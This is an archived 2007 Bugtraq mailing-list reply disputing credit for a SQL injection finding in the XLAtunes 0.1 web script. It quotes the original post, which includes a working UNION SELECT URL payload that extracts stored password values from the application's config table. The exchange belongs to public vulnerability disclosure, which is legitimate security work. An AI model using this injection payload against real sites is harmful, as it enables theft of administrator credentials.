Message-ID: <814b9d50702200934i5a12a22doe66f68ff85253d24@mail.gmail.com>
Date: Tue, 20 Feb 2007 11:34:30 -0600
From: str0ke <str0ke@...w0rm.com>
To: "Guns@...0.com.ar" <Guns@...0.com.ar>
Cc: bugtraq@...urityfocus.com
Subject: Re: XLAtunes 0.1 (album) Remote SQL Injection Vulnerability

This was actually found by Bl0od3r, and was posted on the 17th. Yep
you pretty much nop'ed the found by section, nice job.

http://www.milw0rm.com/exploits/3327

/str0ke

On 19 Feb 2007 19:27:31 -0000, Guns@...0.com.ar <Guns@...0.com.ar> wrote:
> #Critical Status:High
> #Found By: 0x90
> #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
> #Greetz:all my friends
> #confkey->Password
> #confvalue->Username
> #Table:config
> #http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*
>
>